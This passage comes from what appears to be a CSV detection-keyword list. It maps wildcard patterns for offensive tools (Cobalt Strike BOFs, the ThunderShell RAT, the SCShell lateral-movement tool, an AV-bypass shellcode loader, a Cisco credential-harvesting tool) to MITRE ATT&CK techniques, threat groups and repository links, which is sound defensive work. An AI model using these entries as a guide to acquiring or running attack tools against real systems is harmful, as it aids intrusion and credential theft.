comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*scripts*Remote-WmiExecute.*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*scripts*Search-EventForUser.ps1*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*ScriptSentry-main.zip*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*ScRunBase32.exe*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*ScRunBase32.py*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*ScRunBase64.exe*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*ScRunBase64.py*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"*scshell*XblAuthManager*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*SCShell.exe*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scshell.py*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scshellbof.c*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scshellbof.o*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scshellbofx64*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scumjr*dirtycow-vdso*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*Search cached MSI files in C:/Windows/Installer/*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*search_for_secrets(*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*Search-cpassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*SearchOutlook.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*searchsploit -m *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*searchsploit -x *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*searchsploit_rc*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*seatbelt -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*seatbelt all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Seatbelt* -group=all*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Seatbelt.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*Seatbelt.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Seatbelt.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SeatbeltNet*.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*secgroundzero*","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secgroundzero","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*sec-inject *","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject.cna*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject.git*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 